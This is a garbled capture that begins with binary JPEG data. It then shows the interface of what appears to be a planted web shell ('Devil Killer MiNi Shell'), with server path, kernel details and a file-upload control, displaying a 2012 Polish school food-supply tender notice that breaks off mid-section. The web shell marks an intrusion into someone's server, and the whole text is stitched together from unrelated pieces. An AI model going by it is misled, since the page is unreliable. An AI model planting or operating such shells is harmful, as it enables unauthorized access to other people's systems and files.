JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121218/516514-N-2012.html

<p class="kh_header"><b>Moszczenica: Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej na potrzeby wyżywienia uczniów i dzieci w Szkole Podstawowej w Moszczenicy, Dworcowa 9, 
97 - 310 Moszczenica</b><br>
<b>Numer ogłoszenia: 516514 - 2012; data zamieszczenia: 18.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Moszczenicy , ul. Dworcowa 9, 97-310 Moszczenica, woj. łódzkie, tel. 44 616 95 00, faks 44 616 95 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp1.moszczenica.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych do stołówki szkolnej na potrzeby wyżywienia uczniów i dzieci w Szkole Podstawowej w Moszczenicy, Dworcowa 9, 
97 - 310 Moszczenica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  artykułów spożywczych do stołówki szkolnej na potrzeby wyżywienia uczniów i dzieci w Szkole Podstawowej w Moszczenicy, Dworcowa 9, 97 - 310 Moszczenica.

ARTYKUŁY SPOŻYWCZE SUCHE  , PRZYPRAWOWE I PRZETWORY OWOCOWO-WARZYWNE	 	 	 	 	 	 	 

Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Cukier kryształ biały 1kg	kg	260
2	Soki 430 ml	szt.	184
3	Dżem owocowy niskosłodzony słoik o zawartości nie mniej niż 40% 300g	szt.	325
4	Groch łupany  500 g 	kg	92
5	Groszek konserwowy puszka 400g	szt.	28
6	Ogórek konserwowy w słoiku 880 ml	szt.	275
7	Aromat waniliowy	szt.	20
8	Cukier puder 0,5 kg	szt. 48
9.	Jajka kurze kl. A	szt.	7720
10.	Koncentrat pomidorowy 30% 990 g	szt.	266
11.	Kasza jęczmienna średnia  1kg	kg	127
12.	Barszcz czerwony w proszku  1,4             	kg	10
13.	Barszcz ukraiński 0,5 kg	szt.	94
14.	Bulion grzybowy 1 kg	kg	2
15.	Cynamon	szt.	24
16.	Cukier waniliowy	szt.	35
17.	Chrzan 	szt.	17
18.	Mąka pszenna 1kg	kg	520
19.	Majeranek200g-250g	szt.	18
20.	Przyprawa do zup płynna 210ml-1L	L	55
21.	Majonez 500ml	szt.	46
22.	Olej spożywczy rzepakowy 3 l.
        5 l.
        1 l.	szt.
szt. 
szt.	48
31
9
23.	Pieprz czarny mielony 20g-25g	szt.	20
24.	Ryż biały długoziarnisty 5kg	kg	39
25.	Sól jodowana biała 1kg	kg	139
26.	Sos do spaghetti torebka 1,1	kg	10
27.	Zupa barszcz biały  1,4	kg	9
28.	Barszcz biały butelka 0,5L	szt.	133
29.	Fasola Jaś średnia 0,5 kg	kg	210
30.	Drożdże 	szt. 	168
31.	Kwasek cytrynowy 50g	szt.	49
32.	Przyprawa wieloskładnikowa warzywna sypka do potraw 200g-1000g	kg	29
33.	Kasza manna 1 kg	kg	114
34.	Mąka ziemniaczana1 kg	kg	4
35.	Napój 3 kg	szt. 	24
36.	Ryż 	kg	79
37.	Zupy Knorr 1,2 - 1,4 kg lub równoważne	szt. 	17
38.	Sos ciemny pieczeniowy 1,4 kg	kg	18
39.	Makaron o,5 kg
	szt.	797
40.	Makaron spaghetti  3 kg	kg	135
41.	Makaron świderki 3 kg	kg	168
42.	Wafelki (różne)	szt.	1415
43.	Czekolada Wedel lub równoważny	Szt.	1739


NABIAŁ 	 	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Masło śmietankowe o zawartości nie mniej niż 67% 250g	szt.	10
2	Mleko 2% 1L	L	950
3	Śmietana 24% 400g	l	1548
4	Ser żółty pełnotłusty Gołda 900g-1kg  lub równoważny	kg	31,5
5	Serek topiony o zawartości tłuszczu nie mniej niż 25% 125g	kg	120
6	Serek wiejski 200g	kg	20
7	Twaróg biały tłusty 1 kg	kg	305
8	Ser żółty pełnotłusty Gouda  1kg lub równoważny	kg	40
9	Serek Bakoma lub równoważny	szt.	2304
10	Serek Danone lub równoważny	szt.	3724
11	Kefir 400 g	szt.	156
12	Margaryna 250 g	szt.	125
13	Serek homogenizowany	szt.	2025


PIECZYWO	 	 	 	 	 	 	 

Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Bułka zwykła 100g	szt. 	595
2	Bułka tarta 1kg	kg	86
3	Chleb krojony pszenno-żytni jasny 600g-900g	kg	3357


WARZYWA i OWOCE	 	 	 	 	 	 	 
		
Lp.	
Nazwa artykułu i gramatura opakowanie	
Jednostka	
Ilość 
1	2	3	4
1	Ziemniaki jadalne typu kulinarnego (irga,bryza)	kg	6330
2	Kapusta biała świeża	kg	219
3	Marchew korzeń	kg	885
4	Cebula biała korzeń	kg	128
5	Pieczarki gat I	kg	164,5
6	Rzodkiewka	pęczek	50
7	Ogórek  zielony świeży	kg	110
8.	Buraki czerwone świeże	kg	590
9.	Kapusta kwaszona	kg	632
10.	Jabłka gat I	kg	982
11.	Kapusta pekińska świeża	kg	40
12.	Por	kg	23,5
13.	Seler korzeń	kg	285
14.	Pomidory świeże	kg	65
15.	Sałata zielona	szt.	415
16.	Kapusta czerwona świeża	kg	197
17.	Por 	szt.	144
18.	Koper zielony świeży	pęczek	85
19.	Pietruszka korzeń	kg	348
20.	Kalafior 	szt	62
21.	Banany 	kg	346
22.	Papryka świeża czerwona	kg	30
23.	Kapusta młoda świeża	szt	55
24.	Ogórek kiszony	kg	590
25. 	Mandarynki 	kg	200
26. 	Pomarańcza 	kg	292
27.	Kukurydza konserwowa 400 g	szt. 	30


MROŻONKI i RYBY	 	 	 	 	 	 	 

Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Fasolka szparagowa 500g	kg	27
2	Kalafior 500g	kg	117
3	Mieszanka jarzynowa 8-składnikowa 500g	kg	153
4	Marchew mrożona mini 1kg	kg	110
5	Mieszanka kompotowa o,5 kg	kg	192
6	Ryby(filet bez ości, bez glazury, bez skóry-morszczuk)kg	kg	265
7	Brokuły 450 g	szt.	67
8	Brukselka 450 g	szt.	
9	Truskawka mrożona o,5 kg	szt.	150
10	Wiśnie mrożone 0,5 kg	szt. 	79


MIĘSO, PRZETWORY WIEPRZOWO-WOŁOWE i DROBIOWE 	 	 	 	 	 	 
Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Boczek wędzony nieparzony	kg	30
2	Kiełbasa wiejska* cienka o zawartości mięsa nie mniej niż 60%	kg	270
3	Karczek b/k wieprzowy	kg	695
4	Żeberka 	kg	257
5	Mortadela	kg	152
6	Mięso mielone	kg	724
7	Antrykot	kg	8,5
8.	Smalec	kg	160
9.	Słonina surowa bez skóry	kg	10,5
10.	Boczek surowy	kg	32

11.	Kiełbasa  żywiecka* o zawartości mięsa nie mniej niż 80%	kg	5

12.	Schab z/k wieprzowy	kg	658
13.	Golonka	kg	17,6
14.	Wołowina b/k	kg	31

*produkty z wykluczeniem mięsa mechanicznie odkostnionego.


MIĘSO DROBIOWE	 	 	 	 	 	 	 

Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Filet z kurczaka surowy	kg	182
2	Kurczak	kg	126
3	Porcja rosołowa  kurczaka ze skrzydłem	kg	19
4	Udziec z kurczaka	kg	540
5	Porcja rosołowa b/skrz.	kg	138
6	Wątróbka drobiowa	kg	145

Informacje dodatkowe:
1.Wykonawca zobowiązuje się sukcesywnie dostarczać dla Zamawiającego artykuły spożywcze przedstawione w szczegółowych formularzach cenowych stanowiących załączniki nr 1, 2, 3, 4, 5, 6 i 7  od  dnia podpisania niniejszej umowy do 31 grudnia 2013 roku
2. Realizacja dostaw odbywać się będzie od poniedziałku do piątku w godzinach:

Zadanie 1  (artykuły spożywcze suche, przyprawowe i przetwory owocowo-warzywne) 
- 3 razy w tygodniu od godz. 7.00 do godz. 7.30

Zadanie 2  ( nabiał ) -  codziennie od godz.6.30 do godz. 7.30

Zadanie 3  ( pieczywo ) - codziennie od godz.6.30 do godz. 7.30

Zadanie 4  ( warzywa i owoce ) - codziennie od godz.6.30 do godz. 7.30

Zadanie 5  ( mrożonki i ryby ) - 2 razy w tygodniu od godz. 6.30 do godz. 7.30

Zadanie  6 ( mięso, przetwory wieprzowo- wołowe i drobiowe )
 -  codziennie od godz. 7.00 do godz. 7.30

Zadanie 7 ( mięso drobiowe )  -  1 raz w tygodniu od godz. 7.00 do godz. 7.30

z tolerancją  + 30 minut dnia następnego od przekazania zamówienia w formie pisemnej, elektronicznie, faksem lub  po telefonicznym uzgodnieniu.
3. Towar będzie dowożony przez Wykonawcę własnym transportem, na jego koszt, w odpowiednich opakowaniach zapewniających właściwe zabezpieczenie przewożonych artykułów wraz z jego rozładunkiem do magazynu Zamawiającego.
4. Każdorazowa dostawa musi być zgodna pod względem jakościowym i ilościowym z bieżącym zamówieniem Zamawiającego, potwierdzona i odebrana przez upoważnionego przedstawiciela Zamawiającego tj: intendenta lub osobę pisemne upoważnioną przez Dyrektora placówki.
5. Wykonawca przy każdej dostawie zobowiązany jest do dołączenia dokumentu magazynowego (dowodu dostawy lub dokumentu WZ) z wyszczególnieniem produktów i ich ilości oraz faktury VAT .
6. Za datę wykonania poszczególnej dostawy, uważa się datę przyjęcia zamówionych artykułów  bez zastrzeżeń .

7.  Zamawiający zastrzega sobie możliwość zmniejszenia lub zwiększenia ilości artykułów w stosunku do ilości określonych w szczegółowym formularzu cenowym stanowiącym załącznik do oferty nr 1,2,3,4,5,6 i 7 bądź rezygnacji z niektórych artykułów w zależności od liczby żywionych osób i jadłospisów obowiązujących u Zamawiającego w okresie obowiązywania umowy. Nie może to stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń.
8. Zamawiającemu będzie przysługiwać prawo składania reklamacji dotyczących ilości 
i   jakości dostarczanych artykułów z żądaniem ich wymiany lub uzupełnienia.
9. Wykonawca dokona uzupełnienia lub wymiany towaru w ciągu jednej godziny na towar wolny od wad. Zamawiający nie odpowiada za straty poniesione przez Wykonawcę z tego tytułu.
10. Wykonawca zobowiązuje się do dostarczenia artykułów spożywczych, towarów 
w pierwszej jakości, odpowiadających normom jakościowym obowiązującym 
w Rzeczypospolitej Polskiej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.10.00.00-9, 15.50.00.00-3, 15.89.60.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca złoży stosowne oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy, wypełniony formularz ofertowy, wypełniony formularz cenowy dla danej części zamówienia,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Zamawiający przewiduje zmiany zawartej umowy w przypadku m.in. zaistnienia następujących okoliczości:
1. W przypadku zmiany osób związanych z obsługą  administracyjno - organizacyjną, a uczestniczących w wykonaniu niniejszego zamówienia wymaga aprobaty stron umowy, natomiast nie wymaga sporządzenia aneksu.
2. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w następujących przypadkach:
a) zmiana danych Wykonawcy ( np. zmiana adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy,
b) podwyższenia jakości parametrów lub innych cech charakterystycznych dla przedmiotu dostawy,  nazwy własnej produktu, pod warunkiem wprowadzenia na rynek produktu o wyższej jakości, lepszych parametrach lub innych korzystniejszych  cechach charakterystycznych przy zachowaniu ceny oferowanej dla danego produktu na podstawie pisemnego wniosku Wykonawcy pod warunkiem uzyskania zgody przez Zamawiającego,
c) w przypadku wstrzymania lub zakończenia produkcji towarów będących przedmiotem dostawy, możliwość dostarczenia odpowiednich towarów objętych umową, o parametrach nie gorszych, niż towary objęte oferta, przy zachowaniu ceny ofertowej towaru, na podstawie pisemnego wniosku Wykonawcy pod warunkiem uzyskania zgody przez Zamawiającego,
d) w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mogą ulec zmianie terminy sukcesywnych dostaw objętych niniejsza umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp1.moszczenica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa w Moszczenicy, Dworcowa 9, 97-310 Moszczenica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 10:30, miejsce: Szkoła Podstawowa w Moszczenicy, Dworcowa 9, 97-310 Moszczenica - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE SUCHE  , PRZYPRAWOWE I PRZETWORY OWOCOWO-WARZYWNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 
1	2	3	4
1	Cukier kryształ biały 1kg	kg	260
2	Soki 430 ml	szt.	184
3	Dżem owocowy niskosłodzony słoik o zawartości nie mniej niż 40% 300g	szt.	325
4	Groch łupany  500 g 	kg	92
5	Groszek konserwowy puszka 400g	szt.	28
6	Ogórek konserwowy w słoiku 880 ml	szt.	275
7	Aromat waniliowy	szt.	20
8	Cukier puder 0,5 kg	szt.
	48

9.	Jajka kurze kl. A	szt.	7720
10.	Koncentrat pomidorowy 30% 990 g	szt.	266
11.	Kasza jęczmienna średnia  1kg	kg	127
12.	Barszcz czerwony w proszku  1,4             	kg	10
13.	Barszcz ukraiński 0,5 kg	szt.	94
14.	Bulion grzybowy 1 kg	kg	2
15.	Cynamon	szt.	24
16.	Cukier waniliowy	szt.	35
17.	Chrzan 	szt.	17
18.	Mąka pszenna 1kg	kg	520
19.	Majeranek200g-250g	szt.	18
20.	Przyprawa do zup płynna 210ml-1L	L	55
21.	Majonez 500ml	szt.	46
22.	Olej spożywczy rzepakowy 3 l.
                                                  5 l.
                                                  1 l.	szt.
szt. 
szt.	48
31
9
23.	Pieprz czarny mielony 20g-25g	szt.	20
24.	Ryż biały długoziarnisty 5kg	kg	39
25.	Sól jodowana biała 1kg	kg	139
26.	Sos do spaghetti torebka 1,1	kg	10
27.	Zupa barszcz biały  1,4	kg	9
28.	Barszcz biały butelka 0,5L	szt.	133
29.	Fasola Jaś średnia 0,5 kg	kg	210
30.	Drożdże 	szt. 	168
31.	Kwasek cytrynowy 50g	szt.	49
32.	Przyprawa wieloskładnikowa warzywna sypka do potraw 200g-1000g	kg	29
33.	Kasza manna 1 kg	kg	114
34.	Mąka ziemniaczana1 kg	kg	4
35.	Napój 3 kg	szt. 	24
36.	Ryż 	kg	79
37.	Zupy Knorr 1,2 - 1,4 kg lub równoważne	szt. 	17
38.	Sos ciemny pieczeniowy 1,4 kg	kg	18
39.	Makaron o,5 kg
	szt.	797
40.	Makaron spaghetti  3 kg	kg	135
41.	Makaron świderki 3 kg	kg	168
42.	Wafelki (różne)	szt.	1415
43.	Czekolada Wedel lub równoważny	Szt.	1739

Realizacja dostawy odbywać się będzie od poniedziałku do piątku w godzinach:
- 3 razy w tygodniu od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
